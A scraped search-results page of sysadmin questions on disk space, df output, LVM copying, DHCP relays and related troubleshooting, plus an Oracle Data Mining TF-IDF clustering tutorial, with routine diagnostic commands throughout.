Search Results

Search found 580 results on 24 pages for 'df'.


  • Redis 2.0.3 would not let go of deleted appendonly.aof file after BGREWRITEAOF

    - by Alexander Gladysh
    Ubuntu 10.04.2, Redis 2.0.3 (more details at the end of the question). My AOF file for Redis is getting so large that it will soon consume all remaining disk space on my small-HDD VPS box:

      $ df -h
      Filesystem            Size  Used Avail Use% Mounted on
      /dev/xvda              32G   24G  6.7G  78% /

      $ ls -la
      total 3866688
      drwxr-xr-x  2 redis redis       4096 2011-03-02 00:11 .
      drwxr-xr-x 29 root  root        4096 2011-01-24 15:58 ..
      -rw-r-----  1 redis redis 3923246988 2011-03-02 00:14 appendonly.aof
      -rw-rw----  1 redis redis   32356467 2011-03-02 00:11 dump.rdb

    When I run BGREWRITEAOF, the AOF file shrinks, but the disk space is not freed:

      $ ls -la
      total 95440
      drwxr-xr-x  2 redis redis     4096 2011-03-02 00:17 .
      drwxr-xr-x 29 root  root      4096 2011-01-24 15:58 ..
      -rw-rw----  1 redis redis 65137639 2011-03-02 00:17 appendonly.aof
      -rw-rw----  1 redis redis 32476167 2011-03-02 00:17 dump.rdb

      $ df -h
      Filesystem            Size  Used Avail Use% Mounted on
      /dev/xvda              32G   24G  6.7G  78% /

    Sure enough, Redis is still holding the deleted file:

      $ sudo lsof -p6916
      COMMAND   PID  USER  FD  TYPE DEVICE   SIZE/OFF   NODE NAME
      ...
      redis-ser 6916 redis  7r  REG  202,0 3923957317 918129 /var/lib/redis/appendonly.aof (deleted)
      ...
      redis-ser 6916 redis 10w  REG  202,0   66952615 917507 /var/lib/redis/appendonly.aof
      ...

    How can I work around this issue? I can restart Redis this time, but I would really like to avoid doing that on a regular basis. Note that I cannot upgrade to 2.2 (an upgrade to 2.0.4 is feasible, though). More information on my system:

      $ lsb_release -a
      No LSB modules are available.
      Distributor ID: Ubuntu
      Description:    Ubuntu 10.04.2 LTS
      Release:        10.04
      Codename:       lucid

      $ uname -a
      Linux my.box 2.6.32.16-linode28 #1 SMP Sun Jul 25 21:32:42 UTC 2010 i686 GNU/Linux

      $ redis-cli info
      redis_version:2.0.3
      redis_git_sha1:00000000
      redis_git_dirty:0
      arch_bits:32
      multiplexing_api:epoll
      process_id:6916
      uptime_in_seconds:632728
      uptime_in_days:7
      connected_clients:2
      connected_slaves:0
      blocked_clients:0
      used_memory:65714632
      used_memory_human:62.67M
      changes_since_last_save:8398
      bgsave_in_progress:0
      last_save_time:1299014574
      bgrewriteaof_in_progress:0
      total_connections_received:17
      total_commands_processed:55748609
      expired_keys:0
      hash_max_zipmap_entries:64
      hash_max_zipmap_value:512
      pubsub_channels:0
      pubsub_patterns:0
      vm_enabled:0
      role:master
      db0:keys=1,expires=0
      db1:keys=18,expires=0
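    A note for anyone hitting the same symptom: the space does not come back until the last open handle on the deleted file is closed. One way to measure how much space deleted-but-open files are holding (a generic sketch; +L1 selects open files whose link count is below one, and the awk fields assume stock lsof column order):

      $ sudo lsof -nP +L1                    # every deleted-but-still-open file, with its size
      $ sudo lsof -nP +L1 | awk '$5 == "REG" {sum += $7} END {print sum, "bytes held by deleted files"}'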

  • Copy a large LVM volume (14 TB) from one server to another

    - by bruce
    I recently have to copy a very large LVM volume (14 TB) from server A to server B. Below are the filesystems of server A and server B.

    Server A:

      [root@AVDVD-Filer ~]# df -h
      Filesystem                         Size  Used Avail Use% Mounted on
      /dev/mapper/vg_avdvdfiler-lv_root   16T   14T  1.5T  91% /
      tmpfs                              3.0G     0  3.0G   0% /dev/shm
      /dev/cciss/c0d0p1                  194M   23M  162M  13% /boot
      /dev/mapper/vg_avdvdfiler-test     2.3T  201M  2.1T   1% /test
      /dev/sr0                           3.3G  3.3G     0 100% /mnt

    Server B:

      [root@localhost ~]# df -h
      Filesystem                         Size  Used Avail Use% Mounted on
      /dev/mapper/VolGroup-LogVol00       20G  2.5G   16G  14% /
      tmpfs                              3.0G     0  3.0G   0% /dev/shm
      /dev/cciss/c0d0p1                  194M   23M  162M  13% /boot
      /dev/mapper/VolGroup00-LogVol00     16T  133M   15T   1% /xiangao/lv1
      /dev/mapper/VolGroup00-LogVol01    4.7T  190M  4.5T   1% /xiangao/lv2

    I want to copy the LVM volume /dev/mapper/vg_avdvdfiler-lv_root on server A to the LVM volume /dev/mapper/VolGroup00-LogVol00 on server B. Server A and server B are in the same IP segment. The LVM volume on server A holds files averaging 500 MB (avi, wmv, mp4, etc.). I tried mounting /dev/mapper/vg_avdvdfiler-lv_root from server A on server B through NFS, then copying with cp; it clearly failed because the LVM volume is too big. I do not have a good idea, so I hope for a good solution here. (I'm Chinese and my English is poor; sorry, and thanks, everyone!)
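    Since the volume holds ordinary files rather than something that needs a block-level image, a file-level stream is usually the practical route. A sketch with rsync (paths and host are placeholders; --partial lets an interrupted 14 TB transfer resume instead of starting over):

      $ rsync -av --partial --progress /path/to/media/ root@serverB:/xiangao/lv1/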

  • How should I monitor memory usage/performance in SunOS/Solaris?

    - by exhuma
    Last week we decided to add some SunOS machines (uname -a = SunOS bbs-sam-belair 5.10 Generic_127128-11 i86pc i386 i86pc) to our running munin instance. First off, the machines are pre-configured appliances, so I want to avoid touching the system too much without supervision from the service provider. Adding them to munin was fairly easy by writing a small socket service (if anyone is interested, I put it up on GitHub: https://github.com/munin-monitoring/contrib/tree/master/tools/pypmmn). Yesterday I implemented/adapted the required plugins for our machines, and here the questions start.

    First, I have not found a way to determine detailed memory usage values. I get the total memory by running prtconf | grep Memory, and the free memory using vmstat. Fiddling together a munin plugin from these gives me a graph that is pretty much uninformative. Compare this to the default plugin for Linux nodes, which has a lot more detail; most importantly, it shows how much memory is actually used by applications. So, first question: is it possible to get detailed memory information on SunOS with the default system tools (i.e. not using top)?

    Onto the next puzzle: looking at the graphs, I noticed activity in the "paging in/out" graphs even though the memory graph still shows unused memory. Upon further investigation, I found that df reports /tmp as mounted on swap. Drilling around on the web, I understood that df will display it as swap, but in fact it is mounted as a tmpfs. Now I don't know if this explains the swap activity. The default munin plugin for Solaris uses kstat -p -c misc -m cpu_stat to get these values; I already find it strange that it uses the cpu_stat module, so maybe I simply misinterpret the "paging" graphs. Second question: do the paging graphs indicate that parts of memory are paged to disk, or is the activity caused by file operations in /tmp?
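    For the first question, one option on Solaris 10 (a sketch; it needs root, and on a vendor appliance it may be out of bounds) is the kernel debugger's memstat breakdown, plus the raw page counters kstat exposes:

      # echo ::memstat | mdb -k          # kernel / anon / exec / page-cache / free breakdown
      # kstat -p unix:0:system_pages     # raw page counters usable from a munin plugin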

  • Zenoss "No space left on device" error

    - by Pastelinux
    Site Error: an error was encountered while publishing this resource.

      Traceback (innermost last):
        Module ZPublisher.Publish, line 231, in publish_module_standard
        Module ZPublisher.Publish, line 165, in publish
        Module Zope2.App.startup, line 211, in __call__
        Module Products.ZenUI3.browser, line 105, in __call__
        Module Products.Five.browser.pagetemplatefile, line 60, in __call__
        Module zope.pagetemplate.pagetemplate, line 115, in pt_render
        Module zope.tal.talinterpreter, line 271, in __call__
        Module zope.tal.talinterpreter, line 343, in interpret
        Module zope.tal.talinterpreter, line 858, in do_defineMacro
        Module zope.tal.talinterpreter, line 343, in interpret
        Module zope.tal.talinterpreter, line 533, in do_optTag_tal
        Module zope.tal.talinterpreter, line 518, in do_optTag
        Module zope.tal.talinterpreter, line 513, in no_tag
        Module zope.tal.talinterpreter, line 343, in interpret
        Module zope.tal.talinterpreter, line 620, in do_insertText_tal
        Module Products.PageTemplates.Expressions, line 203, in evaluateText
        Module Products.PageTemplates.Expressions, line 222, in _handleText
        Module zope.component._api, line 174, in queryUtility
        Module zope.component.registry, line 165, in queryUtility
        Module ZODB.Connection, line 834, in setstate
        Module ZODB.Connection, line 884, in _setstate
        Module ZEO.ClientStorage, line 815, in load
        Module ZEO.cache, line 143, in call
        Module ZEO.cache, line 607, in store
      IOError: [Errno 28] No space left on device

    I went to check my server through Zenoss today and got the error above; it looks as if the server is somehow full. Yet when I look at the server, the root filesystem is only about 85% used:

      unclebob:~# df -h
      Filesystem                                Size  Used Avail Use% Mounted on
      /dev/mapper/unclebob--vg0-unclebob--root  1.9G  1.5G  335M  82% /
      tmpfs                                     471M     0  471M   0% /lib/init/rw
      udev                                       10M  820K  9.2M   9% /dev
      tmpfs                                     471M     0  471M   0% /dev/shm
      overflow                                  1.0M  1.0M     0 100% /tmp
      /dev/hde1                                 942M   36M  859M   5% /boot

      unclebob:/tmp# df -i
      Filesystem                               Inodes IUsed  IFree IUse% Mounted on
      /dev/mapper/unclebob--vg0-unclebob--root 121920 54844  67076   45% /
      tmpfs                                    120489     3 120486    1% /lib/init/rw
      udev                                     120489  1520 118969    2% /dev
      tmpfs                                    120489     1 120488    1% /dev/shm
      overflow                                 120489    14 120475    1% /tmp
      /dev/hde1                                 61312    33  61279    1% /boot

    There are also two hidden directories in /tmp, .ICE-unix/ and .X11-unix/, which I will remove. Any idea what they may be, and any ideas on a fix? It probably has something to do with Zenoss.
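    The `overflow` line above is the telling one: Debian mounts a tiny 1 MB tmpfs called overflow on /tmp when the root filesystem is nearly full at boot, and whatever writes temp files there (presumably the ZEO client cache in the traceback) then fails with errno 28. Once the root filesystem has space again, a hedged fix is:

      # umount /tmp      # drop the 1 MB overflow mount (make sure nothing holds files open in /tmp first)
      # df -h /tmp       # /tmp should now live on the root filesystem again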

  • Missing MB on a GPT-partitioned SSD

    - by pisswillis
    I recently installed Arch Linux on an Intel 40 GB SSD. I used GPT for partitioning (via GNU parted) and created the following partitions:

      /dev/sda1 : 1 MB,   no FS, flag=bios_grub
      /dev/sda2 : 30 MB,  /boot, ext2, flag=boot
      /dev/sda3 : 20 GB,  /home, ext4
      /dev/sda4 : ~20 GB, /,     ext4

    After struggling to install GRUB 2 from the live-CD environment (which I finally did via grub-install /dev/sda --root-directory=/mnt/ --no-floppy --force) I got a working system. However, when inspecting disk usage with df, I noticed that my home partition had around 170 MB of used space on it. This surprised me, because the only things on /home were one user's .bashrc, .bash_history, and .lesshst; du confirmed that only a few KB of space were being used on /home.

    Why does df report approximately 170 MB used when du does not? Is this space gone forever, or can I regain it by repartitioning and/or reinstalling? When I installed GRUB 2, it said something along the lines of "your embed area is too small" and that I could "use BLOCKLISTS, but BLOCKLISTS are UNRELIABLE". In the end the only way I could get the system booting from the SSD was to use blocklists via the grub-install --force flag. Is this related to the mysterious missing 170 MB? Thanks.
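    Part of such a gap is ordinary ext4 overhead: the journal (often 128 MB by default on a partition this size) and other metadata count as used in df but are invisible to du. A sketch for inspecting it (device name taken from the question; run as root):

      # tune2fs -l /dev/sda3 | grep -i 'block count'     # total and reserved block counts
      # dumpe2fs -h /dev/sda3 | grep -i journal          # journal details for the filesystem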

  • wget crawling search results of news website

    - by kiltek
    I am trying to crawl the search results of a news website, www.voanews.com, using wget. After typing in my search keyword and clicking search, the site shows the results; I can then specify a "to" and a "from" date and hit search again, after which the URL becomes:

      http://www.voanews.com/search/?st=article&k=mykeyword&df=10%2F01%2F2013&dt=09%2F20%2F2013&ob=dt#article

    The actual content of the results is what I want to download. To achieve this I created the following wget command:

      wget --reject=js,txt,gif,jpeg,jpg \
           --accept=html \
           --user-agent=My-Browser \
           --recursive --level=2 \
           www.voanews.com/search/?st=article&k=germany&df=08%2F21%2F2013&dt=09%2F20%2F2013&ob=dt#article

    Unfortunately, the crawler doesn't download the search results. It only gets into the upper link bar, which contains the "Home, USA, Africa, Asia, ..." links, and saves the articles they link to; it seems the crawler doesn't check the search-result links at all. What am I doing wrong, and how can I modify the wget command to download only the search-result list links (and, of course, the pages they link to)?
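    One thing to check before blaming wget: the unquoted & characters make the shell cut the URL at the first & and background the command, so wget never sees the k, df, and dt parameters (and the #article fragment is never sent to a server anyway). The same command with the URL quoted, as a sketch:

      wget --reject=js,txt,gif,jpeg,jpg \
           --accept=html \
           --user-agent=My-Browser \
           --recursive --level=2 \
           "http://www.voanews.com/search/?st=article&k=germany&df=08%2F21%2F2013&dt=09%2F20%2F2013&ob=dt"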

  • ERROR: Not enough space?

    - by dsmoljanovic
    Now this is a very unspecific question: I'm trying to figure out what the message "ERROR: Not enough space" would mean. Here is the story behind it. I'm installing Oracle Enterprise Manager Cloud Control (12c R3) on Solaris 10 (5/09). The installer opens up, I enter all the needed information, and at the last step I click Install. It immediately crashes with only "ERROR: Not enough space" written to the log and console, and nothing else. Now, could this be a Java error or a Solaris error? I'm thinking it happens either when the installer starts to copy files or when it tries to launch a process that would do that. What space is it referring to? Disk (have enough), swap (also), memory (yep)... Any ideas are helpful.

    Edit: I found this exception in the oraInventory logs:

      oracle.sysman.oii.oiic.OiicInstallAPIException: Not enough space
        at oracle.sysman.oii.oiic.OiicAPIInstaller.initInstallSession(OiicAPIInstaller.java:2165)
        at oracle.sysman.oii.oiic.OiicAPIInstaller.initOUIAPISession(OiicAPIInstaller.java:790)
        at oracle.sysman.install.oneclick.EMGCOUIInstaller.prepareForInstall(EMGCOUIInstaller.java:676)
        at oracle.sysman.install.oneclick.EMGCSummaryDlgonNext$1.run(EMGCSummaryDlgonNext.java:243)
        at java.lang.Thread.run(Thread.java:662)
        at oracle.sysman.install.oneclick.EMGCSummaryDlgonNext.actionsOnClickofNext(EMGCSummaryDlgonNext.java:1067)
        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:39)
        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25)
        at java.lang.reflect.Method.invoke(Method.java:597)
        at oracle.sysman.install.oneclick.EMGCUtil.performonClickOfNextForClass(EMGCUtil.java:399)
        at oracle.sysman.install.oneclick.EMGCUtil.performPageLevelValidationsForSilentInstall(EMGCUtil.java:367)
        at oracle.sysman.install.oneclick.EMGCInstaller.prepareForSilentInstall(EMGCInstaller.java:1459)
        at oracle.sysman.install.oneclick.EMGCInstaller.main(EMGCInstaller.java:1553)

    Disk status:

      bash-3.00$ df -h /tmp
      Filesystem  size  used  avail  capacity  Mounted on
      swap        8.1G  2.7G  5.4G   33%       /tmp

      bash-3.00$ df -h /u01
      Filesystem  size  used  avail  capacity  Mounted on
      /           275G  28G   244G   11%       /u01

    Swap:

      root@gs12emcc # swap -s
      total: 18306040k bytes allocated + 3837808k reserved = 22143848k used, 5712664k available
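    The Oracle Universal Installer stages files in a temp directory and checks free space there, so one hedged workaround (the directory name here is a placeholder) is to point it at a roomier scratch area on /u01 before launching:

      $ mkdir -p /u01/tmp
      $ export TMP=/u01/tmp TMPDIR=/u01/tmp
      $ ./runInstaller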

  • SSD suddenly full

    - by Daniel
    Today the hard drive of our server was suddenly full. Disk usage had always stayed around 50% in the weeks and months before (old data is regularly expunged from the server). I deleted 10 GB of files in /tmp, which strangely freed 51 GB. Here is what I did:

      root@***:~# df -h
      Filesystem  Size  Used  Avail Use% Mounted on
      /dev/sda3   139G  137G      0 100% /
      tmpfs       3,9G     0   3,9G   0% /lib/init/rw
      udev        3,9G  116K   3,9G   1% /dev
      tmpfs       3,9G     0   3,9G   0% /dev/shm
      /dev/sda1   985M   25M   910M   3% /boot

      root@***:/var# du -hs *
      3,3M  backups
      438M  cache
      9,4G  lib
      4,0K  local
      12K   lock
      76M   log
      24K   mail
      4,0K  opt
      88K   run
      184K  spool
      10G   tmp
      12K   www

      root@***:/var/tmp# find -type f -print0 | xargs -0 rm

      root@***:/var/tmp# df -h
      Filesystem  Size  Used  Avail Use% Mounted on
      /dev/sda3   139G   81G    51G  62% /
      tmpfs       3,9G     0   3,9G   0% /lib/init/rw
      udev        3,9G  116K   3,9G   1% /dev
      tmpfs       3,9G     0   3,9G   0% /dev/shm
      /dev/sda1   985M   25M   910M   3% /boot

    Any explanation as to why deleting 10 GB in /tmp gave me back 51 GB on the disk? Could this point to an SSD failure? Are there any tools for Debian to test SSD health? I have already checked syslog; the first entry relating to this incident is a MySQL message:

      1:22:02 [ERROR] /usr/sbin/mysqld: Disk is full writing...

    So I have absolutely no idea what caused this.
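    When df and du disagree like this, the usual suspect is files deleted while a process still held them open; their blocks stay allocated until the handle closes, which would also fit the mysqld error. A hedged first check, plus a basic Debian SSD health probe:

      $ sudo lsof +L1 /                  # deleted-but-open files on / that still hold space
      $ sudo smartctl -a /dev/sda        # SMART health report; needs the smartmontools package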

  • Disk partitioning on CentOS

    - by FlourishDNA
    I am setting up a server to host two WordPress sites with a combined size of around 70 GB. I have already installed CentOS as the OS, and I would like to partition the disk. Is there any tool that can help me, or can someone guide me through the process? I am not an expert with SSH commands. Here is some output that might help.

    OS: CentOS release 6.3

      fdisk -l

      Disk /dev/xvdb: 214.7 GB, 214748364800 bytes
      255 heads, 63 sectors/track, 26108 cylinders
      Units = cylinders of 16065 * 512 = 8225280 bytes
      Sector size (logical/physical): 512 bytes / 512 bytes
      I/O size (minimum/optimal): 512 bytes / 512 bytes
      Disk identifier: 0x000b91e0

      Device Boot Start End Blocks Id System

      Disk /dev/xvda: 21.5 GB, 21474836480 bytes
      255 heads, 63 sectors/track, 2610 cylinders
      Units = cylinders of 16065 * 512 = 8225280 bytes
      Sector size (logical/physical): 512 bytes / 512 bytes
      I/O size (minimum/optimal): 512 bytes / 512 bytes
      Disk identifier: 0x000e542c

      Device Boot   Start   End    Blocks    Id  System
      /dev/xvda1 *  1       64     512000    83  Linux
      Partition 1 does not end on cylinder boundary.
      /dev/xvda2    64      2611   20458496  8e  Linux LVM

      Disk /dev/mapper/vg_flourish-lv_root: 16.7 GB, 16718495744 bytes
      255 heads, 63 sectors/track, 2032 cylinders
      Units = cylinders of 16065 * 512 = 8225280 bytes
      Sector size (logical/physical): 512 bytes / 512 bytes
      I/O size (minimum/optimal): 512 bytes / 512 bytes
      Disk identifier: 0x00000000

      Disk /dev/mapper/vg_flourish-lv_swap: 4227 MB, 4227858432 bytes
      255 heads, 63 sectors/track, 514 cylinders
      Units = cylinders of 16065 * 512 = 8225280 bytes
      Sector size (logical/physical): 512 bytes / 512 bytes
      I/O size (minimum/optimal): 512 bytes / 512 bytes
      Disk identifier: 0x00000000

      df
      Filesystem                       1K-blocks    Used  Available Use% Mounted on
      /dev/mapper/vg_flourish-lv_root   16070076  758184   14495560   5% /
      tmpfs                               958500       0     958500   0% /dev/shm
      /dev/xvda1                          495844   31926     438318   7% /boot

      df -h
      Filesystem                       Size  Used Avail Use% Mounted on
      /dev/mapper/vg_flourish-lv_root   16G  741M   14G   5% /
      tmpfs                            937M     0  937M   0% /dev/shm
      /dev/xvda1                       485M   32M  429M   7% /boot

    Thanks
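    A minimal sketch of turning the empty 200 GB disk into LVM storage for the sites (volume and mount names are placeholders; double-check the device before running anything destructive):

      # pvcreate /dev/xvdb                          # mark the whole disk as an LVM physical volume
      # vgcreate vg_data /dev/xvdb                  # create a volume group on it
      # lvcreate -n lv_www -L 100G vg_data          # carve out a logical volume for the sites
      # mkfs.ext4 /dev/vg_data/lv_www               # put a filesystem on it
      # mkdir -p /var/www && mount /dev/vg_data/lv_www /var/www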

  • Wipe free space on LVM-LUKS (dm-crypt) Volume

    - by peter4887
    The three partitions for my system are created with LVM on a LUKS partition (dm-crypt): /home, / and swap, all ext4. They are encrypted because they are on my laptop and I don't want a laptop thief to get my data. But I often share my laptop with other people, so they can access my encrypted partitions, and I don't want them to be able to recover my cache and all the data I deleted. So I'm now trying to wipe all the free space on /home to prevent recovery with tools like photorec. (One overwrite should do; the need for multiple overwrites is just a rumor.) But I still haven't found any way to wipe this free space successfully.

    I tried:

      dd if=/dev/zero of=/home/fillitup bs=512 count=[count of free sectors]

    so the partition was completely full of data; df /dev/mapper/home said 100% was used and there were 0 sectors available. But I could still recover gigabytes of data with photorec, even though I selected recovery from the free space only. photorec displays

      /dev/mapper/home - 340 GB / 317 GiB (RO)

    while df says the size of /home is just 313G. Why the difference, and what does the 340 GB refer to? It looks like there is a place on my /dev/mapper/home partition that I can't access to overwrite, but that I can access to recover. I also checked for corrupted sectors, and there aren't any. Maybe this is the space between my existing files? Does anyone know why I can't wipe the free space with dd, and how I can find the location of these loads of recoverable files so I can securely delete them?
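    Rather than computing a sector count, it is simpler to let dd run until the filesystem refuses more data, then sync before deleting; note also that a non-root user cannot fill the root-reserved blocks (typically 5% on ext4), which may be part of what photorec keeps finding. A sketch:

      $ dd if=/dev/zero of=/home/fillitup bs=1M    # runs until "No space left on device"
      $ sync                                       # make sure the zeros actually hit the disk
      $ rm /home/fillitup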

  • How to copy a large LVM volume (14TB) from one server to another?

    - by bruce
    I have to copy a very large LVM volume from server A to server B. Below are the filesystems of server A and server B.

    Server A:

      [root@AVDVD-Filer ~]# df -h
      Filesystem                         Size  Used Avail Use% Mounted on
      /dev/mapper/vg_avdvdfiler-lv_root   16T   14T  1.5T  91% /
      tmpfs                              3.0G     0  3.0G   0% /dev/shm
      /dev/cciss/c0d0p1                  194M   23M  162M  13% /boot
      /dev/mapper/vg_avdvdfiler-test     2.3T  201M  2.1T   1% /test
      /dev/sr0                           3.3G  3.3G     0 100% /mnt

    Server B:

      [root@localhost ~]# df -h
      Filesystem                         Size  Used Avail Use% Mounted on
      /dev/mapper/VolGroup-LogVol00       20G  2.5G   16G  14% /
      tmpfs                              3.0G     0  3.0G   0% /dev/shm
      /dev/cciss/c0d0p1                  194M   23M  162M  13% /boot
      /dev/mapper/VolGroup00-LogVol00     16T  133M   15T   1% /xiangao/lv1
      /dev/mapper/VolGroup00-LogVol01    4.7T  190M  4.5T   1% /xiangao/lv2

    I want to copy the LVM volume /dev/mapper/vg_avdvdfiler-lv_root on server A to the LVM volume /dev/mapper/VolGroup00-LogVol00 on server B. Server A and server B are in the same IP segment. The LVM volume on server A holds files averaging 500 MB (avi, wmv, mp4, etc.). I tried mounting /dev/mapper/vg_avdvdfiler-lv_root from server A on server B through NFS, then copying with cp; it clearly failed because the LVM volume is too big, and I do not have a better idea why. I hope for a good solution here.
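    Since the target filesystem on server B already exists and is big enough, one way to avoid NFS entirely is to stream the files with tar piped over ssh (paths and host are placeholders; a sketch, not a tested recipe):

      $ tar -C /path/to/data -cf - . | ssh root@serverB 'tar -C /xiangao/lv1 -xf -'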

  • Using a "white list" for extracting terms for Text Mining, Part 2

    - by [email protected]
    In my last post, we set the groundwork for extracting specific tokens from a white list using a CTXRULE index. In this post, we will populate a table with the extracted tokens and produce a case table suitable for clustering with Oracle Data Mining.

    Our corpus of documents will be stored in a database table that is defined as

      create table documents(id NUMBER, text VARCHAR2(4000));

    However, any suitable Oracle Text-accepted data type can be used for the text. We then create a table to contain the extracted tokens. The id column contains the unique identifier (or case id) of the document, and the token column contains the extracted token. Note that a given document may have many tokens, so there will be one row per token for a given document.

      create table extracted_tokens (id NUMBER, token VARCHAR2(4000));

    The next step is to iterate over the documents, extract the matching tokens using the index, and insert them into our token table. We use the MATCHES function for matching the query_string from my_thesaurus_rules with the text.

      DECLARE
        cursor c2 is
          select id, text
          from documents;
      BEGIN
        for r_c2 in c2 loop
          insert into extracted_tokens
            select r_c2.id id, main_term token
            from my_thesaurus_rules
            where matches(query_string, r_c2.text) > 0;
        end loop;
      END;

    Now that we have the tokens, we can compute the term frequency - inverse document frequency (TF-IDF) for each token of each document.

      create table extracted_tokens_tfidf as
        with num_docs as (select count(distinct id) doc_cnt
                          from extracted_tokens),
             tf       as (select a.id, a.token,
                                 a.token_cnt/b.num_tokens token_freq
                          from
                            (select id, token, count(*) token_cnt
                             from extracted_tokens
                             group by id, token) a,
                            (select id, count(*) num_tokens
                             from extracted_tokens
                             group by id) b
                          where a.id = b.id),
             doc_freq as (select token, count(*) overall_token_cnt
                          from extracted_tokens
                          group by token)
        select tf.id, tf.token,
               token_freq * ln(doc_cnt/df.overall_token_cnt) tf_idf
        from num_docs,
             tf,
             doc_freq df
        where df.token = tf.token;

    In the WITH clause, the num_docs query simply counts the number of documents in the corpus. The tf query computes the term (token) frequency by counting the number of times each token appears in a document and dividing that by the number of tokens found in the document. The doc_freq query counts the number of times each token appears overall in the corpus. In the SELECT clause, we compute the tf_idf.

    Next, we create the nested table required to produce one record per case, where a case corresponds to an individual document. Here, we COLLECT all the tokens for a given document into the nested column extracted_tokens_tfidf_1.

      CREATE TABLE extracted_tokens_tfidf_nt
          NESTED TABLE extracted_tokens_tfidf_1
              STORE AS extracted_tokens_tfidf_tab AS
        select id,
               cast(collect(DM_NESTED_NUMERICAL(token, tf_idf)) as DM_NESTED_NUMERICALS) extracted_tokens_tfidf_1
        from extracted_tokens_tfidf
        group by id;

    To build the clustering model, we create a settings table and then insert the various settings. Most notable are the number of clusters (20), using cosine distance, which is better for text, turning off automatic data preparation since the values are ready for mining, the number of iterations (20) to get a better model, and the split criterion of size for clusters that are roughly balanced in the number of cases assigned.

      CREATE TABLE km_settings (setting_name VARCHAR2(30), setting_value VARCHAR2(30));

      BEGIN
        INSERT INTO km_settings (setting_name, setting_value)
          VALUES (dbms_data_mining.clus_num_clusters, 20);
        INSERT INTO km_settings (setting_name, setting_value)
          VALUES (dbms_data_mining.kmns_distance, dbms_data_mining.kmns_cosine);
        INSERT INTO km_settings (setting_name, setting_value)
          VALUES (dbms_data_mining.prep_auto, dbms_data_mining.prep_auto_off);
        INSERT INTO km_settings (setting_name, setting_value)
          VALUES (dbms_data_mining.kmns_iterations, 20);
        INSERT INTO km_settings (setting_name, setting_value)
          VALUES (dbms_data_mining.kmns_split_criterion, dbms_data_mining.kmns_size);
        COMMIT;
      END;

    With this in place, we can now build the clustering model.

      BEGIN
        DBMS_DATA_MINING.CREATE_MODEL(
          model_name          => 'TEXT_CLUSTERING_MODEL',
          mining_function     => dbms_data_mining.clustering,
          data_table_name     => 'extracted_tokens_tfidf_nt',
          case_id_column_name => 'id',
          settings_table_name => 'km_settings');
      END;

    To generate cluster names from this model, check out my earlier post on that topic.

  • Replies to a request coming over a relay go to the relay's internal IP, not the original request's source IP

    - by seaquest
    dhcpd running on Linux gets a DHCP request via dhcrelay, which runs on another remote machine:

      Oct 6 10:09:46 2012 dhcpd: DHCPDISCOVER from 00:1e:68:06:eb:37 (oguz-U300) via 172.16.17.81

      tcpdump: listening on eth1, link-type EN10MB (Ethernet), capture size 96 bytes
      10:35:01.112500 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto: UDP (17), length: 328) 192.168.0.81.67 > 192.168.0.1.67: BOOTP/DHCP, Request from 00:1e:68:06:eb:37, length: 300, hops:1, xid:0xe378fc7e, flags: [none] (0x0000)
        Gateway IP: 172.16.17.81
        Client Ethernet Address: 00:1e:68:06:eb:37 [|bootp]

    It matches a subnet and sends a reply. However, the reply does not go to the requesting dhcrelay's external IP (192.168.0.81); instead, it goes to the internal interface IP of the machine running dhcrelay, and I think because of this the remote machine running dhcrelay, or dhcrelay itself, discards the packet:

      Oct 6 10:09:46 2012 dhcpd: DHCPOFFER on 172.16.17.11 to 00:1e:68:06:eb:37 (oguz-U300) via 172.16.17.81

      10:35:02.050108 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto: UDP (17), length: 328) 192.168.0.1.67 > 172.16.17.81.67: BOOTP/DHCP, Reply, length: 300, hops:1, xid:0xe378fc7e, flags: [none] (0x0000)
        Your IP: 172.16.17.11
        Gateway IP: 172.16.17.81
        Client Ethernet Address: 00:1e:68:06:eb:37 [|bootp]

    Is this normal behaviour?

    Machine running dhcrelay:

      eth1(ext) Link encap:Ethernet HWaddr 00:90:0B:21:43:F4
                inet addr:192.168.0.81 Bcast:192.168.0.255 Mask:255.255.255.0
      eth2(int) Link encap:Ethernet HWaddr 00:90:0B:21:43:F5
                inet addr:172.16.17.81 Bcast:172.16.17.255 Mask:255.255.255.0

      3582 ? Ss 0:00 /usr/sbin/dhcrelay -i eth2 192.168.0.1

    Machine running dhcpd:

      eth1 Link encap:Ethernet HWaddr 00:90:0B:23:97:D1
           inet addr:192.168.0.1 Bcast:192.168.0.255 Mask:255.255.255.0

      option domain-name "test.com";
      option subnet-mask 255.255.255.0;
      authoritative;
      ignore client-updates;
      ddns-update-style ad-hoc;
      default-lease-time 86400;
      max-lease-time 86400;

      subnet 192.168.0.0 netmask 255.255.255.0 {
        range 192.168.0.135 192.168.0.169;
        option broadcast-address 192.168.0.255;
        option domain-name-servers 192.168.0.1;
        option domain-name "test.com";
        option routers 192.168.0.1;
      }

      subnet 172.16.17.0 netmask 255.255.255.0 {
        local-address 192.168.0.1;
        server-identifier 192.168.0.1;
        range 172.16.17.10 172.16.17.11;
        option broadcast-address 172.16.17.255;
        option routers 172.16.17.81;
      }

    (I set local-address and server-identifier, but this does not help.)

    Regards,
    -- Oguz YILMAZ

    UPDATE: The first problem is found. I had configured dhcrelay to listen only on the internal interface; it seems (of course) it should also listen on the external interface for replies. It appears it does not matter where the packet is destined: dhcrelay will forward it to the internal net. HOWEVER, I then deleted the route on the dhcpd server for the 172.16.17.x subnet, and dhcpd again tries to send the reply to 172.16.17.81; because it does not know the route, it sends the packet out the default gateway to the internet:

      eth0: IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto: UDP (17), length: 328) 192.168.1.2.67 > 172.16.17.81.67: BOOTP/DHCP, Reply, length: 300, hops:1, xid:0x32830125, secs:3, flags: [none] (0x0000)
      eth0: Your IP: 172.16.17.11
      eth0: Gateway IP: 172.16.17.81
      eth0: Client Ethernet Address: 00:1e:68:06:eb:37 [|bootp]

    How can I force dhcpd to send replies to the requesting relay's IP? It is not very meaningful to have to add routes for every subnet we distribute IPs for.

      Internet - dhcpd - 192.168.0.1 - SOMENET - 192.168.0.81 - dhcrelay - 172.16.17.0/24

    192.168.0.1 has no route for 172.16.17.0 and no interface directly attached to that net.
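    On the relay side, ISC dhcrelay can take -i more than once, so it can listen on both the internal and the external interface; a sketch matching the interfaces above:

      /usr/sbin/dhcrelay -i eth1 -i eth2 192.168.0.1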

  • Java ME scorecard with vector and multiple input fields/screens

